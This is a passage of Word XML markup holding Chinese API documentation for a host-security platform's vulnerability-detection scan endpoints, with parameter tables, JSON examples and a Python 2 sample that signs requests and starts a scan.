            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2DC0E7D2" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>是否必填</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5C8A2094" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="6740D59E" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2F535071" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>type</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2A41D7FE" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>tinyint(4)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3B07F60D" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>是</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3B773534" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>0/1/2 全部主机/agent范围/业务组范围</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="6F5DC63D" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3D500469" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>agentIds</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="41C60D35" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>string数组</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="65F574A8" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>如果type为1 必填</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="14893909" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>主机agentId数组</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="6D194F82" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7B8B064C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>group</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1F7D806E" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>int数组</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2CB4C850" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>如果type为2 必填</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2E75826D" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>业务组id范围</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="7F0C2C1A" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>请求示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1104E7A5" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>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agentIds"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OtherTok"/>
        </w:rPr>
        <w:t>[</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t>"94e4c7a4f5dec750"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OtherTok"/>
        </w:rPr>
        <w:t>]</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="043764B6" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>返回示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C1F3D55" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">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 job id"</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3580CDF5" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>如果无在线agent返回：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2969EEF2" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t>"errorCode"</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no online agent"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ErrorTok"/>
        </w:rPr>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">      </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ErrorTok"/>
        </w:rPr>
        <w:t>错误描述</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t>"detail"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t>null</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60008391" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>如果有作业在运行返回：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EC440B9"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19F3B407"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5BDAF3D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54E3A93" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1529DE90" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="024C06E5" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>建议长度</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="39B124BB" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="5237FE63" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="79C9BB79" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>id</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4B2A0386" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>string</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="25D5FB2E" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(24)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1D11E2D6" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>扫描任务ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="49270337" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>场景说明：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78B33A5B" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:t>这个api调用前需要先调用4.5.2查询风险扫描执行状态接口，如果该接口返回状态非Running， 则可以调用该漏洞检测扫描接口创建漏洞检测扫描job。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ED2AC0C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>异常说明：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="431F0CEB" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:t>如果任务创建失败， 抛出异常。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="193F74EE" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>代码示例(python)：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="327594F8" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>#! /usr/bin/env python</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t># -*- coding: utf-8 -*-</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>from __future__ import absolute_import</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:br/>
        <w:t>import httplib</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>import json</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>import time</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>import hashlib</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>host = "tests.qingteng.cn"</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>port = 80</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
        <w:t># 登录请求调用示例</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>def login():</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    conn = httplib.HTTPConnection(host, port)</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    url = "http://%s:%s/v1/api/auth" % (host, port)</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    header = {"Content-Type": "application/json"}</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    body = {"username": "dev@qingteng.cn", "password": "abc@123"}</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    json_body = json.dumps(body)</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    conn.request(method="POST", url=url, body=json_body, headers=header)</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    response = conn.getresponse()</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    res = response.read()</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    return json.loads(res)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
        <w:t># 发送请求</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>def send_request(method, url, data):</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    # 参看登录认证里面的登录方法代码示例</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    login_result = login()</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    sign_key = login_result.get("data").get("signKey")</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    jwt = login_result.get("data").get("jwt")</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    comid = login_result.get("data").get("comId")</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    # 当前时间戳</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    ts = int(time.time())</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    if data is not None:</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        info = ""</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        if method == "GET":</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            # 对参数key进行字典排序</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            keys = sorted(data.keys())</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            for key in keys:</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                info = info + key + str(data.get(key))</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                print info</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        elif method == "POST" or method == "PUT" or method == "DELETE":</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            info = json.dumps(data)</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        # 拼接待签名字符串</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        to_sign = comid + info + str(ts) + sign_key</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    else:</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        # 拼接待签名字符串</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">        to_sign = comid + str(ts) + sign_key</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    print to_sign</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    # 对待签名字符串进行sha1得到签名字符串</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    sign = hashlib.sha1(to_sign).hexdigest()</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    # 组装http请求头参数</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    header = {"Content-Type": "application/json", "comId": comid, "timestamp": ts,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">              "sign": sign, "Authorization": "Bearer " + jwt}</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    conn = httplib.HTTPConnection(host, port)</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    conn.request(method=method, url=url, body=json.dumps(data), headers=header)</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    response = conn.getresponse()</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    res = response.read()</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    return res</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
        <w:t># linux启动漏洞扫描的代码示例(python)</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>def start_poc_check():</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    url = "http://%s:%s/external/api/vul/poc/linux/check" % (</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        host, port)</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    data = {}</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    res = send_request("POST", url, data)</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    print "result: ", res</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t># linux漏洞检测，检查运行应用</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>def check_app_running():</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    url = "http://%s:%s/external/api/vul/poc/check_app_running" % (</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        host, port)</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    data = {"vulId":"QT042017002027"}</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    res = send_request("POST", url, data)</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    print "result: ", res</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>if __name__ == '__main__':</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    start_poc_check()</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    check_app_running()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63E0C502" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:bookmarkStart w:id="114" w:name="查询漏洞检测扫描执行状态"/>
      <w:bookmarkEnd w:id="113"/>
      <w:r>
        <w:t>查询漏洞检测扫描执行状态</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40F2D28A" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>调用接口：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E83D8CA" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>GET /external/api/vul/poc/{linux|win}/check/status</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6320A35C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>请求参数：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7627E26D" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:t>无</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73265FEA" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>请求示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="223A78A3" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>/external/api/vul/poc/linux/check/status</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3832DCF5" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>返回示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12537162" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "status":"Running|Success|Failed"</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26316FEE"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788"/>
        <w:gridCol w:w="760"/>
        <w:gridCol w:w="1200"/>
        <w:gridCol w:w="7334"/>
      </w:tblGrid>
      <w:tr w:rsidR="00497C54" w14:paraId="3840A18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19FC132" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="78C37CCB" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7E976B95" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>建议长度</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="12072C71" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="3C565051" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="22816D8B" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>status</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5A543B7F" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>string</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6C7B5458" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(7)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="525FB2AC" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>"执行中;成功;失败"，最近一次漏洞检测扫描job执行状态，如果从未执行过漏洞检测扫描job，状态为Success</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="5654197A" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:bookmarkStart w:id="115" w:name="查询漏洞检测结果"/>
      <w:bookmarkEnd w:id="114"/>
      <w:r>
        <w:t>查询漏洞检测结果</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7362464B" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>调用接口：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C2F9772" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
